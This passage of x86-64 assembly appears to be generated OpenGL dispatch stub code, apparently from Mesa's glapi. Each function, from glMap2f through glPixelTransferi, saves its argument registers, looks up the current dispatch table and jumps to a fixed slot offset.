#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1784(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $88, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %rsi, 24(%rsp)
movq %rdx, 32(%rsp)
movq %xmm2, 40(%rsp)
movq %xmm3, 48(%rsp)
movq %rcx, 56(%rsp)
movq %r8, 64(%rsp)
movq %r9, 72(%rsp)
call _x86_64_get_dispatch@PLT
movq 72(%rsp), %r9
movq 64(%rsp), %r8
movq 56(%rsp), %rcx
movq 48(%rsp), %xmm3
movq 40(%rsp), %xmm2
movq 32(%rsp), %rdx
movq 24(%rsp), %rsi
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $88, %rsp
movq 1784(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1784(%rax), %r11
jmp *%r11
1:
subq $88, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %rsi, 24(%rsp)
movq %rdx, 32(%rsp)
movq %xmm2, 40(%rsp)
movq %xmm3, 48(%rsp)
movq %rcx, 56(%rsp)
movq %r8, 64(%rsp)
movq %r9, 72(%rsp)
call _glapi_get_dispatch
movq 72(%rsp), %r9
movq 64(%rsp), %r8
movq 56(%rsp), %rcx
movq 48(%rsp), %xmm3
movq 40(%rsp), %xmm2
movq 32(%rsp), %rdx
movq 24(%rsp), %rsi
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $88, %rsp
movq 1784(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Map2f), .-GL_PREFIX(Map2f)
/* glMapGrid1d dispatch stub: tail-jump through dispatch-table
 * slot 224 (byte offset 1792).  The non-TLS paths spill %rdi and the
 * low quadwords of %xmm0/%xmm1 into a 24-byte stack frame around the
 * lookup call (frame size keeps %rsp 16-byte aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(MapGrid1d)
.type GL_PREFIX(MapGrid1d), @function
GL_PREFIX(MapGrid1d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1792(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 1792(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1792(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 1792(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MapGrid1d), .-GL_PREFIX(MapGrid1d)
/* glMapGrid1f dispatch stub: tail-jump through dispatch-table
 * slot 225 (byte offset 1800).  Same save scheme as MapGrid1d:
 * %rdi, %xmm0 and %xmm1 spilled into a 24-byte frame around the
 * lookup call (frame size keeps %rsp 16-byte aligned). */
.p2align 4,,15
.globl GL_PREFIX(MapGrid1f)
.type GL_PREFIX(MapGrid1f), @function
GL_PREFIX(MapGrid1f):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1800(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 1800(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1800(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 1800(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MapGrid1f), .-GL_PREFIX(MapGrid1f)
/* glMapGrid2d dispatch stub: tail-jump through dispatch-table
 * slot 226 (byte offset 1808).  The non-TLS paths spill %rdi, %xmm0,
 * %xmm1, %rsi, %xmm2 and %xmm3 (low quadwords for the XMM regs) into
 * a 56-byte stack frame around the lookup call (the spare 8 bytes
 * keep %rsp 16-byte aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(MapGrid2d)
.type GL_PREFIX(MapGrid2d), @function
GL_PREFIX(MapGrid2d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1808(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $56, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %rsi, 24(%rsp)
movq %xmm2, 32(%rsp)
movq %xmm3, 40(%rsp)
call _x86_64_get_dispatch@PLT
movq 40(%rsp), %xmm3
movq 32(%rsp), %xmm2
movq 24(%rsp), %rsi
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $56, %rsp
movq 1808(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1808(%rax), %r11
jmp *%r11
1:
subq $56, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %rsi, 24(%rsp)
movq %xmm2, 32(%rsp)
movq %xmm3, 40(%rsp)
call _glapi_get_dispatch
movq 40(%rsp), %xmm3
movq 32(%rsp), %xmm2
movq 24(%rsp), %rsi
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $56, %rsp
movq 1808(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MapGrid2d), .-GL_PREFIX(MapGrid2d)
/* glMapGrid2f dispatch stub: tail-jump through dispatch-table
 * slot 227 (byte offset 1816).  Same save scheme as MapGrid2d:
 * %rdi, %xmm0, %xmm1, %rsi, %xmm2 and %xmm3 spilled into a 56-byte
 * frame around the lookup call (frame size keeps %rsp 16-byte
 * aligned). */
.p2align 4,,15
.globl GL_PREFIX(MapGrid2f)
.type GL_PREFIX(MapGrid2f), @function
GL_PREFIX(MapGrid2f):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1816(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $56, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %rsi, 24(%rsp)
movq %xmm2, 32(%rsp)
movq %xmm3, 40(%rsp)
call _x86_64_get_dispatch@PLT
movq 40(%rsp), %xmm3
movq 32(%rsp), %xmm2
movq 24(%rsp), %rsi
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $56, %rsp
movq 1816(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1816(%rax), %r11
jmp *%r11
1:
subq $56, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %rsi, 24(%rsp)
movq %xmm2, 32(%rsp)
movq %xmm3, 40(%rsp)
call _glapi_get_dispatch
movq 40(%rsp), %xmm3
movq 32(%rsp), %xmm2
movq 24(%rsp), %rsi
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $56, %rsp
movq 1816(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MapGrid2f), .-GL_PREFIX(MapGrid2f)
/* glEvalCoord1d dispatch stub: tail-jump through dispatch-table
 * slot 228 (byte offset 1824).  Its single argument arrives in %xmm0
 * (caller-saved), so the non-TLS paths spill its low quadword into an
 * 8-byte stack frame around the lookup call (frame size keeps %rsp
 * 16-byte aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(EvalCoord1d)
.type GL_PREFIX(EvalCoord1d), @function
GL_PREFIX(EvalCoord1d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1824(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $8, %rsp
movq %xmm0, (%rsp)
call _x86_64_get_dispatch@PLT
movq (%rsp), %xmm0
addq $8, %rsp
movq 1824(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1824(%rax), %r11
jmp *%r11
1:
subq $8, %rsp
movq %xmm0, (%rsp)
call _glapi_get_dispatch
movq (%rsp), %xmm0
addq $8, %rsp
movq 1824(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EvalCoord1d), .-GL_PREFIX(EvalCoord1d)
/* glEvalCoord1dv dispatch stub: tail-jump through dispatch-table
 * slot 229 (byte offset 1832).  Only %rdi is preserved across the
 * lookup call in the non-TLS paths (a single push keeps %rsp
 * 16-byte aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(EvalCoord1dv)
.type GL_PREFIX(EvalCoord1dv), @function
GL_PREFIX(EvalCoord1dv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1832(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1832(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1832(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1832(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EvalCoord1dv), .-GL_PREFIX(EvalCoord1dv)
/* glEvalCoord1f dispatch stub: tail-jump through dispatch-table
 * slot 230 (byte offset 1840).  Its single argument arrives in %xmm0
 * (caller-saved), so the non-TLS paths spill its low quadword into an
 * 8-byte stack frame around the lookup call (frame size keeps %rsp
 * 16-byte aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(EvalCoord1f)
.type GL_PREFIX(EvalCoord1f), @function
GL_PREFIX(EvalCoord1f):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1840(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $8, %rsp
movq %xmm0, (%rsp)
call _x86_64_get_dispatch@PLT
movq (%rsp), %xmm0
addq $8, %rsp
movq 1840(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1840(%rax), %r11
jmp *%r11
1:
subq $8, %rsp
movq %xmm0, (%rsp)
call _glapi_get_dispatch
movq (%rsp), %xmm0
addq $8, %rsp
movq 1840(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EvalCoord1f), .-GL_PREFIX(EvalCoord1f)
/* glEvalCoord1fv dispatch stub: tail-jump through dispatch-table
 * slot 231 (byte offset 1848).  Only %rdi is preserved across the
 * lookup call in the non-TLS paths (a single push keeps %rsp
 * 16-byte aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(EvalCoord1fv)
.type GL_PREFIX(EvalCoord1fv), @function
GL_PREFIX(EvalCoord1fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1848(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1848(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1848(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1848(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EvalCoord1fv), .-GL_PREFIX(EvalCoord1fv)
/* glEvalCoord2d dispatch stub: tail-jump through dispatch-table
 * slot 232 (byte offset 1856).  Both arguments arrive in %xmm0/%xmm1
 * (caller-saved), so the non-TLS paths spill their low quadwords into
 * a 24-byte stack frame around the lookup call (the 8 spare bytes
 * keep %rsp 16-byte aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(EvalCoord2d)
.type GL_PREFIX(EvalCoord2d), @function
GL_PREFIX(EvalCoord2d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1856(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 1856(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1856(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 1856(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EvalCoord2d), .-GL_PREFIX(EvalCoord2d)
/* glEvalCoord2dv dispatch stub: tail-jump through dispatch-table
 * slot 233 (byte offset 1864).  Only %rdi is preserved across the
 * lookup call in the non-TLS paths (a single push keeps %rsp
 * 16-byte aligned at the call). */
.p2align 4,,15
.globl GL_PREFIX(EvalCoord2dv)
.type GL_PREFIX(EvalCoord2dv), @function
GL_PREFIX(EvalCoord2dv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1864(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1864(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1864(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1864(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EvalCoord2dv), .-GL_PREFIX(EvalCoord2dv)
.p2align 4,,15
.globl GL_PREFIX(EvalCoord2f)
.type GL_PREFIX(EvalCoord2f), @function
GL_PREFIX(EvalCoord2f):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1872(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 1872(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1872(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 1872(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EvalCoord2f), .-GL_PREFIX(EvalCoord2f)
.p2align 4,,15
.globl GL_PREFIX(EvalCoord2fv)
.type GL_PREFIX(EvalCoord2fv), @function
GL_PREFIX(EvalCoord2fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1880(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1880(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1880(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1880(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EvalCoord2fv), .-GL_PREFIX(EvalCoord2fv)
	.p2align 4,,15
	.globl GL_PREFIX(EvalMesh1)
	.type GL_PREFIX(EvalMesh1), @function
/*
 * Dispatch stub for glEvalMesh1(GLenum mode, GLint i1, GLint i2).
 * Tail-jumps through dispatch table slot 1888/8 = 236.
 * Three integer arguments in %rdi/%rsi/%rdx per the SysV ABI.
 */
GL_PREFIX(EvalMesh1):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1888(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	/* Save the three argument registers around the getter call.
	 * An odd push count (3) restores 16-byte %rsp alignment. */
	pushq %rdi
	pushq %rsi
	pushq %rdx
	call _x86_64_get_dispatch@PLT
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1888(%rax), %r11
	jmp *%r11
#else
	/* Fast path: global dispatch pointer already set. */
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 1888(%rax), %r11
	jmp *%r11
1:
	/* Slow path: initialize the dispatch pointer first. */
	pushq %rdi
	pushq %rsi
	pushq %rdx
	call _glapi_get_dispatch
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1888(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(EvalMesh1), .-GL_PREFIX(EvalMesh1)
.p2align 4,,15
.globl GL_PREFIX(EvalPoint1)
.type GL_PREFIX(EvalPoint1), @function
GL_PREFIX(EvalPoint1):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1896(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1896(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1896(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1896(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EvalPoint1), .-GL_PREFIX(EvalPoint1)
	.p2align 4,,15
	.globl GL_PREFIX(EvalMesh2)
	.type GL_PREFIX(EvalMesh2), @function
/*
 * Dispatch stub for glEvalMesh2(GLenum mode, GLint i1, GLint i2,
 *                               GLint j1, GLint j2).
 * Tail-jumps through dispatch table slot 1904/8 = 238.
 * Five integer arguments in %rdi/%rsi/%rdx/%rcx/%r8.
 */
GL_PREFIX(EvalMesh2):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1904(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	/* Save all five argument registers; 5 pushes (odd) also restore
	 * 16-byte %rsp alignment at the call.  Pops mirror the pushes. */
	pushq %rdi
	pushq %rsi
	pushq %rdx
	pushq %rcx
	pushq %r8
	call _x86_64_get_dispatch@PLT
	popq %r8
	popq %rcx
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1904(%rax), %r11
	jmp *%r11
#else
	/* Fast path: global dispatch pointer already set. */
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 1904(%rax), %r11
	jmp *%r11
1:
	/* Slow path: initialize the dispatch pointer first. */
	pushq %rdi
	pushq %rsi
	pushq %rdx
	pushq %rcx
	pushq %r8
	call _glapi_get_dispatch
	popq %r8
	popq %rcx
	popq %rdx
	popq %rsi
	popq %rdi
	movq 1904(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(EvalMesh2), .-GL_PREFIX(EvalMesh2)
.p2align 4,,15
.globl GL_PREFIX(EvalPoint2)
.type GL_PREFIX(EvalPoint2), @function
GL_PREFIX(EvalPoint2):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1912(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 1912(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1912(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 1912(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EvalPoint2), .-GL_PREFIX(EvalPoint2)
	.p2align 4,,15
	.globl GL_PREFIX(AlphaFunc)
	.type GL_PREFIX(AlphaFunc), @function
/*
 * Dispatch stub for glAlphaFunc(GLenum func, GLclampf ref).
 * Tail-jumps through dispatch table slot 1920/8 = 240.
 */
GL_PREFIX(AlphaFunc):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1920(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	/* Save the two live argument registers.  %rbp is NOT an argument:
	 * it is a harmless callee-saved register pushed only as padding,
	 * making the push count odd so %rsp is 16-byte aligned at the
	 * call (two pushes alone would leave %rsp % 16 == 8). */
	pushq %rdi
	pushq %rsi
	pushq %rbp
	call _x86_64_get_dispatch@PLT
	popq %rbp
	popq %rsi
	popq %rdi
	movq 1920(%rax), %r11
	jmp *%r11
#else
	/* Fast path: global dispatch pointer already set. */
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 1920(%rax), %r11
	jmp *%r11
1:
	/* Slow path: initialize the dispatch pointer first. */
	pushq %rdi
	pushq %rsi
	pushq %rbp
	call _glapi_get_dispatch
	popq %rbp
	popq %rsi
	popq %rdi
	movq 1920(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(AlphaFunc), .-GL_PREFIX(AlphaFunc)
.p2align 4,,15
.globl GL_PREFIX(BlendFunc)
.type GL_PREFIX(BlendFunc), @function
GL_PREFIX(BlendFunc):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1928(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 1928(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1928(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 1928(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(BlendFunc), .-GL_PREFIX(BlendFunc)
.p2align 4,,15
.globl GL_PREFIX(LogicOp)
.type GL_PREFIX(LogicOp), @function
GL_PREFIX(LogicOp):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1936(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1936(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1936(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1936(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(LogicOp), .-GL_PREFIX(LogicOp)
.p2align 4,,15
.globl GL_PREFIX(StencilFunc)
.type GL_PREFIX(StencilFunc), @function
GL_PREFIX(StencilFunc):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1944(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1944(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1944(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1944(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(StencilFunc), .-GL_PREFIX(StencilFunc)
.p2align 4,,15
.globl GL_PREFIX(StencilOp)
.type GL_PREFIX(StencilOp), @function
GL_PREFIX(StencilOp):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1952(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1952(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1952(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1952(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(StencilOp), .-GL_PREFIX(StencilOp)
.p2align 4,,15
.globl GL_PREFIX(DepthFunc)
.type GL_PREFIX(DepthFunc), @function
GL_PREFIX(DepthFunc):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1960(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1960(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1960(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1960(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DepthFunc), .-GL_PREFIX(DepthFunc)
.p2align 4,,15
.globl GL_PREFIX(PixelZoom)
.type GL_PREFIX(PixelZoom), @function
GL_PREFIX(PixelZoom):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1968(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 1968(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1968(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 1968(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PixelZoom), .-GL_PREFIX(PixelZoom)
	.p2align 4,,15
	.globl GL_PREFIX(PixelTransferf)
	.type GL_PREFIX(PixelTransferf), @function
/*
 * Dispatch stub for glPixelTransferf(GLenum pname, GLfloat param).
 * Tail-jumps through dispatch table slot 1976/8 = 247.
 * Mixed arguments: integer in %rdi, float in %xmm0.
 */
GL_PREFIX(PixelTransferf):
#if defined(GLX_USE_TLS)
	call _x86_64_get_dispatch@PLT
	movq 1976(%rax), %r11
	jmp *%r11
#elif defined(PTHREADS)
	/* Spill both live argument registers into a 24-byte frame:
	 * 16 bytes of saves + 8 of padding to keep %rsp 16-byte
	 * aligned at the call. */
	subq $24, %rsp
	movq %rdi, (%rsp)
	movq %xmm0, 8(%rsp)	/* low 64 bits hold the float argument */
	call _x86_64_get_dispatch@PLT
	movq 8(%rsp), %xmm0
	movq (%rsp), %rdi
	addq $24, %rsp
	movq 1976(%rax), %r11
	jmp *%r11
#else
	/* Fast path: global dispatch pointer already set. */
	movq _glapi_Dispatch(%rip), %rax
	testq %rax, %rax
	je 1f
	movq 1976(%rax), %r11
	jmp *%r11
1:
	/* Slow path: initialize the dispatch pointer first. */
	subq $24, %rsp
	movq %rdi, (%rsp)
	movq %xmm0, 8(%rsp)
	call _glapi_get_dispatch
	movq 8(%rsp), %xmm0
	movq (%rsp), %rdi
	addq $24, %rsp
	movq 1976(%rax), %r11
	jmp *%r11
#endif /* defined(GLX_USE_TLS) */
	.size GL_PREFIX(PixelTransferf), .-GL_PREFIX(PixelTransferf)
.p2align 4,,15
.globl GL_PREFIX(PixelTransferi)
.type GL_PREFIX(PixelTransferi), @function
GL_PREFIX(PixelTransferi):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1984(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 1984(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1984(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 1984(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PixelTransferi), .-GL_PREFIX(PixelTransferi)
.p2align 4,,15
.globl GL_PREFIX(PixelStoref)
.type GL_PREFIX(PixelStoref), @function
GL_PREFIX(PixelStoref):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
